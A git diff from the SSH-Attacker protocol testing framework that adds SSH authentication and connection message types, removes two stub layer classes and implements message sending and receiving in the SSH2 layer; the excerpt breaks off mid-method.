SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 84dcffbca..0a89683f6 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -8,6 +8,7 @@ package de.rub.nds.sshattacker.core.config; import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.modifiablevariable.util.IllegalStringAdapter; import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; import de.rub.nds.sshattacker.core.connection.InboundConnection; import de.rub.nds.sshattacker.core.connection.OutboundConnection; @@ -45,6 +46,17 @@ public Integer getDefaultAdditionalPadding() { return defaultAdditionalPadding; } + public String getDefaultAuthenticationMessageData() { + return defaultAuthenticationMessageData; + } + + public void setDefaultAuthenticationMessageData(String defaultAuthenticationMessageData) { + this.defaultAuthenticationMessageData = defaultAuthenticationMessageData; + } + + @XmlJavaTypeAdapter(IllegalStringAdapter.class) + private String defaultAuthenticationMessageData = "Test"; + public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { this.defaultAdditionalPadding = defaultAdditionalPadding; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java index cd1b31370..af0b0305a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java @@ -17,8 +17,10 @@ public enum ProtocolMessageType { HANDSHAKE((byte) 22), APPLICATION_DATA((byte) 23), HEARTBEAT((byte) 24), - TLS12_CID((byte) 25); - + TLS12_CID((byte) 25), + AUTHENTICATION((byte) 1), + CONNECTION((byte) 2), + TRANSPORT((byte) 3); private byte value; private static final Map MAP; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java index 9c2b64e27..0b45a1be4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java @@ -1,10 +1,9 @@ /* - * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * SSH-Attacker - A Modular Penetration Testing Framework for SSH * * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH * - * Licensed under Apache License, Version 2.0 - * http://www.apache.org/licenses/LICENSE-2.0.txt + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 */ package de.rub.nds.sshattacker.core.exceptions; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java index aa2b3fb99..0d55a944f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java @@ -1,10 +1,9 @@ /* - * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * SSH-Attacker - A Modular Penetration Testing Framework for SSH * * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH * - * Licensed under Apache License, Version 2.0 - * http://www.apache.org/licenses/LICENSE-2.0.txt + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 */ package de.rub.nds.sshattacker.core.exceptions; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java index c4a24e8c0..9e43485a6 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java @@ -21,6 +21,7 @@ public WorkflowExecutionException(String message) { public WorkflowExecutionException(String message, Throwable t) { super(message, t); } + public WorkflowExecutionException(Throwable throwable) { super(throwable); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index fb0b88693..c0a5a3498 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -233,6 +233,16 @@ public void setRandom(Random random) { /** If set to true, a version exchange message was sent by each side */ private boolean versionExchangeCompleted = false; + public byte[] getLastHandledAuthenticationMessageData() { + return lastHandledApplicationMessageData; + } + + public void setLastHandledApplicationMessageData(byte[] lastHandledApplicationMessageData) { + this.lastHandledApplicationMessageData = lastHandledApplicationMessageData; + } + + private byte[] lastHandledApplicationMessageData; + private CompressionAlgorithm selectedCompressionAlgorithm; public CompressionAlgorithm getSelectedCompressionAlgorithm() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java deleted file mode 100644 index e59378c51..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java +++ /dev/null @@ -1,229 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.layer.impl; - -/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; -import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; -import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerConfiguration; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.message.*;*/ - -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; -import de.rub.nds.sshattacker.core.layer.ProtocolLayer; -import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import java.io.IOException; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationLayer extends ProtocolLayer { - - private static final Logger LOGGER = LogManager.getLogger(); - private SshContext context; - - public AuthenticationLayer(SshContext context) { - super(ImplementedLayers.AuthenticationLayer); - this.context = context; - } - - @Override - public LayerProcessingResult sendConfiguration() throws IOException { - /*LayerConfiguration configuration = getLayerConfiguration(); - if (configuration != null && !configuration.getContainerList().isEmpty()) { - for (ProtocolMessage ssl2message : configuration.getContainerList()) { - ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - ssl2message.getHandler(context).adjustContext(ssl2message); - ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - ssl2message.setCompleteResultingMessage(serializedMessage); - ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); - ssl2message.getHandler(context).updateDigest(ssl2message, true); - getLowerLayer() - .sendData( - new RecordLayerHint(ssl2message.getProtocolMessageType()), - serializedMessage); - addProducedContainer(ssl2message); - } - } - return getLayerResult();*/ - return null; - } - - @Override - public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) - throws IOException { - return sendConfiguration(); - } - - @Override - public LayerProcessingResult receiveData() { - - /*try { - int messageLength = 0; - byte paddingLength = 0; - byte[] totalHeader; - HintedInputStream dataStream = null; - SSL2MessageType messageType; - try { - - dataStream = getLowerLayer().getDataStream(); - totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); - - if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { - messageLength = resolveUnpaddedMessageLength(totalHeader); - paddingLength = 0x00; - } else { - messageLength = resolvePaddedMessageLength(totalHeader); - paddingLength = dataStream.readByte(); - } - messageType = SSL2MessageType.getMessageType(dataStream.readByte()); - } catch (IOException e) { - LOGGER.warn( - "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); - messageType = SSL2MessageType.SSL_UNKNOWN; - } - - SSL2Message message = null; - - switch (messageType) { - case SSL_CLIENT_HELLO: - message = new SSL2ClientHelloMessage(); - break; - case SSL_CLIENT_MASTER_KEY: - message = new SSL2ClientMasterKeyMessage(); - break; - case SSL_SERVER_VERIFY: - message = new SSL2ServerVerifyMessage(); - break; - case SSL_SERVER_HELLO: - message = new SSL2ServerHelloMessage(); - break; - default: - message = new UnknownSSL2Message(); - } - - message.setType((byte) messageType.getType()); - message.setMessageLength(messageLength); - message.setPaddingLength((int) paddingLength); - readDataContainer(message, context); - - } catch (TimeoutException ex) { - LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); - } - - return getLayerResult();*/ - return null; - } - - /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 - | totalHeaderLength[1]; - } - - private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 - | totalHeaderLength[1]; - }*/ - - @Override - public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { - try { - HintedInputStream dataStream = null; - dataStream = getLowerLayer().getDataStream(); - if (dataStream.getHint() == null) { - LOGGER.warn( - "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); - currentInputStream = new HintedLayerInputStream(null, this); - currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof RecordLayerHint) { - RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); - /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { - DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); - fragment.setEpoch(tempHint.getEpoch()); - DtlsHandshakeMessageFragmentParser parser = - fragment.getParser( - context, - new ByteArrayInputStream( - dataStream.readChunk(dataStream.available()))); - parser.parse(fragment); - fragment.setCompleteResultingMessage( - fragment.getSerializer(context).serialize()); - fragmentManager.addMessageFragment(fragment); - List uninterpretedMessageFragments = - fragmentManager.getOrderedCombinedUninterpretedMessageFragments( - true, false); - // run until we received a complete fragment - if (!uninterpretedMessageFragments.isEmpty()) { - DtlsHandshakeMessageFragment uninterpretedMessageFragment = - uninterpretedMessageFragments.get(0); - addProducedContainer(uninterpretedMessageFragment); - RecordLayerHint currentHint = - new RecordLayerHint( - uninterpretedMessageFragment.getProtocolMessageType(), - uninterpretedMessageFragment - .getMessageSequence() - .getValue()); - byte type = uninterpretedMessageFragment.getType().getValue(); - byte[] content = - uninterpretedMessageFragment.getMessageContent().getValue(); - byte[] message = - ArrayConverter.concatenate( - new byte[] {type}, - ArrayConverter.intToBytes( - content.length, - HandshakeByteLength.MESSAGE_LENGTH_FIELD), - content); - if (desiredHint == null || currentHint.equals(desiredHint)) { - if (currentInputStream == null) { - currentInputStream = new HintedLayerInputStream(currentHint, this); - } else { - currentInputStream.setHint(currentHint); - } - currentInputStream.extendStream(message); - } else { - if (nextInputStream == null) { - nextInputStream = new HintedLayerInputStream(currentHint, this); - } else { - nextInputStream.setHint(currentHint); - } - nextInputStream.extendStream(message); - } - } else { - receiveMoreDataForHint(desiredHint); - } - } else { - currentInputStream = new HintedLayerInputStream(tempHint, this); - currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); - }*/ - } - } catch (TimeoutException ex) { - LOGGER.debug(ex); - throw ex; - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); - throw ex; - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java deleted file mode 100644 index 77051d0b2..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java +++ /dev/null @@ -1,229 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.layer.impl; - -/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; -import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; -import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerConfiguration; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.message.*;*/ - -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; -import de.rub.nds.sshattacker.core.layer.ProtocolLayer; -import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import java.io.IOException; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionLayer extends ProtocolLayer { - - private static final Logger LOGGER = LogManager.getLogger(); - private SshContext context; - - public ConnectionLayer(SshContext context) { - super(ImplementedLayers.ConnectionLayer); - this.context = context; - } - - @Override - public LayerProcessingResult sendConfiguration() throws IOException { - /*LayerConfiguration configuration = getLayerConfiguration(); - if (configuration != null && !configuration.getContainerList().isEmpty()) { - for (ProtocolMessage ssl2message : configuration.getContainerList()) { - ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - ssl2message.getHandler(context).adjustContext(ssl2message); - ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - ssl2message.setCompleteResultingMessage(serializedMessage); - ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); - ssl2message.getHandler(context).updateDigest(ssl2message, true); - getLowerLayer() - .sendData( - new RecordLayerHint(ssl2message.getProtocolMessageType()), - serializedMessage); - addProducedContainer(ssl2message); - } - } - return getLayerResult();*/ - return null; - } - - @Override - public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) - throws IOException { - return sendConfiguration(); - } - - @Override - public LayerProcessingResult receiveData() { - - /*try { - int messageLength = 0; - byte paddingLength = 0; - byte[] totalHeader; - HintedInputStream dataStream = null; - SSL2MessageType messageType; - try { - - dataStream = getLowerLayer().getDataStream(); - totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); - - if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { - messageLength = resolveUnpaddedMessageLength(totalHeader); - paddingLength = 0x00; - } else { - messageLength = resolvePaddedMessageLength(totalHeader); - paddingLength = dataStream.readByte(); - } - messageType = SSL2MessageType.getMessageType(dataStream.readByte()); - } catch (IOException e) { - LOGGER.warn( - "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); - messageType = SSL2MessageType.SSL_UNKNOWN; - } - - SSL2Message message = null; - - switch (messageType) { - case SSL_CLIENT_HELLO: - message = new SSL2ClientHelloMessage(); - break; - case SSL_CLIENT_MASTER_KEY: - message = new SSL2ClientMasterKeyMessage(); - break; - case SSL_SERVER_VERIFY: - message = new SSL2ServerVerifyMessage(); - break; - case SSL_SERVER_HELLO: - message = new SSL2ServerHelloMessage(); - break; - default: - message = new UnknownSSL2Message(); - } - - message.setType((byte) messageType.getType()); - message.setMessageLength(messageLength); - message.setPaddingLength((int) paddingLength); - readDataContainer(message, context); - - } catch (TimeoutException ex) { - LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); - } - - return getLayerResult();*/ - return null; - } - - /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 - | totalHeaderLength[1]; - } - - private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 - | totalHeaderLength[1]; - }*/ - - @Override - public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { - try { - HintedInputStream dataStream = null; - dataStream = getLowerLayer().getDataStream(); - if (dataStream.getHint() == null) { - LOGGER.warn( - "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); - currentInputStream = new HintedLayerInputStream(null, this); - currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof RecordLayerHint) { - RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); - /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { - DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); - fragment.setEpoch(tempHint.getEpoch()); - DtlsHandshakeMessageFragmentParser parser = - fragment.getParser( - context, - new ByteArrayInputStream( - dataStream.readChunk(dataStream.available()))); - parser.parse(fragment); - fragment.setCompleteResultingMessage( - fragment.getSerializer(context).serialize()); - fragmentManager.addMessageFragment(fragment); - List uninterpretedMessageFragments = - fragmentManager.getOrderedCombinedUninterpretedMessageFragments( - true, false); - // run until we received a complete fragment - if (!uninterpretedMessageFragments.isEmpty()) { - DtlsHandshakeMessageFragment uninterpretedMessageFragment = - uninterpretedMessageFragments.get(0); - addProducedContainer(uninterpretedMessageFragment); - RecordLayerHint currentHint = - new RecordLayerHint( - uninterpretedMessageFragment.getProtocolMessageType(), - uninterpretedMessageFragment - .getMessageSequence() - .getValue()); - byte type = uninterpretedMessageFragment.getType().getValue(); - byte[] content = - uninterpretedMessageFragment.getMessageContent().getValue(); - byte[] message = - ArrayConverter.concatenate( - new byte[] {type}, - ArrayConverter.intToBytes( - content.length, - HandshakeByteLength.MESSAGE_LENGTH_FIELD), - content); - if (desiredHint == null || currentHint.equals(desiredHint)) { - if (currentInputStream == null) { - currentInputStream = new HintedLayerInputStream(currentHint, this); - } else { - currentInputStream.setHint(currentHint); - } - currentInputStream.extendStream(message); - } else { - if (nextInputStream == null) { - nextInputStream = new HintedLayerInputStream(currentHint, this); - } else { - nextInputStream.setHint(currentHint); - } - nextInputStream.extendStream(message); - } - } else { - receiveMoreDataForHint(desiredHint); - } - } else { - currentInputStream = new HintedLayerInputStream(tempHint, this); - currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); - }*/ - } - } catch (TimeoutException ex) { - LOGGER.debug(ex); - throw ex; - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); - throw ex; - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 7b7e8c5db..08f6af8d4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -19,8 +19,10 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; @@ -29,7 +31,12 @@ import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; +import java.io.ByteArrayOutputStream; import java.io.IOException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -44,8 +51,44 @@ public SSH2Layer(SshContext context) { this.context = context; } + private void flushCollectedMessages( + ProtocolMessageType runningProtocolMessageType, ByteArrayOutputStream byteStream) + throws IOException { + if (byteStream.size() > 0) { + getLowerLayer() + .sendData( + new RecordLayerHint(runningProtocolMessageType), + byteStream.toByteArray()); + byteStream.reset(); + } + } + @Override public LayerProcessingResult sendConfiguration() throws IOException { + LayerConfiguration configuration = getLayerConfiguration(); + ProtocolMessageType runningProtocolMessageType = null; + ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); + + if (configuration != null && configuration.getContainerList() != null) { + for (ProtocolMessage message : configuration.getContainerList()) { + if (containerAlreadyUsedByHigherLayer(message) + || !prepareDataContainer(message, context)) { + continue; + } + // Es gibt erstmal keine Handshake-Messages mit einer Spezialbehandlung bei SSH + /*if (!message.isHandshakeMessage()) { + // only handshake messages may share a record + flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + }*/ + runningProtocolMessageType = message.getProtocolMessageType(); + processMessage(message, collectedMessageStream); + addProducedContainer(message); + } + } + // hand remaining serialized to record layer + flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); + return getLayerResult(); + /*LayerConfiguration configuration = getLayerConfiguration(); if (configuration != null && !configuration.getContainerList().isEmpty()) { for (ProtocolMessage ssl2message : configuration.getContainerList()) { @@ -66,7 +109,29 @@ public LayerProcessingResult sendConfiguration() throws IOException { } } return getLayerResult();*/ - return null; + } + + private void processMessage( + ProtocolMessage message, ByteArrayOutputStream collectedMessageStream) + throws IOException { + ProtocolMessageSerializer serializer = message.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + message.setCompleteResultingMessage(serializedMessage); + + // Wird nicht benötigt, da wir keinen "Gesamt"-Digest benötigen ? + // message.getHandler(context).updateDigest(message, true); + + if (message.getAdjustContext()) { + message.getHandler(context).adjustContext(message); + } + collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); + // Unklar für SSHv2, erstmal ignoriert + /*if (mustFlushCollectedMessagesImmediately(message)) { + flushCollectedMessages(message.getProtocolMessageType(), collectedMessageStream); + }*/ + if (message.getAdjustContext()) { + message.getHandler(context).adjustContextAfterSerialize(message); + } } @Override @@ -78,6 +143,35 @@ public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additiona @Override public LayerProcessingResult receiveData() { + try { + HintedInputStream dataStream; + do { + try { + dataStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + // the lower layer does not give us any data so we can simply return here + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return getLayerResult(); + } + LayerProcessingHint tempHint = dataStream.getHint(); + if (tempHint == null) { + LOGGER.warn( + "The TLS message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); + readUnknownProtocolData(); + } else if (tempHint instanceof RecordLayerHint) { + RecordLayerHint hint = (RecordLayerHint) dataStream.getHint(); + readMessageForHint(hint); + } + // receive until the layer configuration is satisfied or no data is left + } while (shouldContinueProcessing()); + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + } + + return getLayerResult(); + /*try { int messageLength = 0; byte paddingLength = 0; @@ -134,7 +228,6 @@ public LayerProcessingResult receiveData() { } return getLayerResult();*/ - return null; } /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { @@ -147,6 +240,152 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) | totalHeaderLength[1]; }*/ + public void readMessageForHint(RecordLayerHint hint) { + switch (hint.getType()) { + // use correct parser for the message + /* case ALERT: + readAlertProtocolData(); + break; + case APPLICATION_DATA: + readAppDataProtocolData(); + break; + case CHANGE_CIPHER_SPEC: + readCcsProtocolData(hint.getEpoch()); + break; + case HANDSHAKE: + readHandshakeProtocolData(); + break; + case HEARTBEAT: + readHeartbeatProtocolData(); + break; + case UNKNOWN: + readUnknownProtocolData(); + break;*/ + case AUTHENTICATION: + readAuthenticationProtocolData(); + break; + case CONNECTION: + readConnectionProtocolData(); + break; + default: + LOGGER.error("Undefined record layer type"); + break; + } + } + + private void readAuthenticationProtocolData() { + AuthenticationMessage message = new AuthenticationMessage(); + readDataContainer(message, context); + } + + private void readConnectionProtocolData() { + ConnectionMessage message = new ConnectionMessage(); + readDataContainer(message, context); + } + + /*private void readAlertProtocolData() { + AlertMessage message = new AlertMessage(); + readDataContainer(message, context); + } + + private ApplicationMessage readAppDataProtocolData() { + ApplicationMessage message = new ApplicationMessage(); + readDataContainer(message, context); + getLowerLayer().removeDrainedInputStream(); + return message; + } + + private void readCcsProtocolData(Integer epoch) { + ChangeCipherSpecMessage message = new ChangeCipherSpecMessage(); + if (context.getSelectedProtocolVersion().isDTLS()) { + if (context.getDtlsReceivedChangeCipherSpecEpochs().contains(epoch) + && context.getConfig().isIgnoreRetransmittedCcsInDtls()) { + message.setAdjustContext(false); + } else { + context.addDtlsReceivedChangeCipherSpecEpochs(epoch); + } + } + readDataContainer(message, context); + } + + */ + /** + * Parses the handshake layer header from the given message and parses the encapsulated message + * using the correct parser. + * + * @throws IOException + */ + /* + private void readHandshakeProtocolData() { + byte[] readBytes = new byte[0]; + byte type; + int length; + byte[] payload; + HandshakeMessage handshakeMessage; + HintedInputStream handshakeStream; + try { + handshakeStream = getLowerLayer().getDataStream(); + type = handshakeStream.readByte(); + readBytes = ArrayConverter.concatenate(readBytes, new byte[] {type}); + handshakeMessage = + MessageFactory.generateHandshakeMessage( + HandshakeMessageType.getMessageType(type), context); + handshakeMessage.setType(type); + byte[] lengthBytes = + handshakeStream.readChunk(HandshakeByteLength.MESSAGE_LENGTH_FIELD); + length = ArrayConverter.bytesToInt(lengthBytes); + readBytes = ArrayConverter.concatenate(readBytes, lengthBytes); + handshakeMessage.setLength(length); + payload = handshakeStream.readChunk(length); + readBytes = ArrayConverter.concatenate(readBytes, payload); + + } catch (IOException ex) { + LOGGER.error("Could not parse message header. Setting bytes as unread: ", ex); + // not being able to parse the header leaves us with unreadable bytes + // append instead of replace because we can read multiple messages in one read action + setUnreadBytes(ArrayConverter.concatenate(this.getUnreadBytes(), readBytes)); + return; + } + Handler handler = handshakeMessage.getHandler(context); + handshakeMessage.setMessageContent(payload); + + try { + handshakeMessage.setCompleteResultingMessage( + ArrayConverter.concatenate( + new byte[] {type}, + ArrayConverter.intToBytes( + length, HandshakeByteLength.MESSAGE_LENGTH_FIELD), + payload)); + Parser parser = handshakeMessage.getParser(context, new ByteArrayInputStream(payload)); + 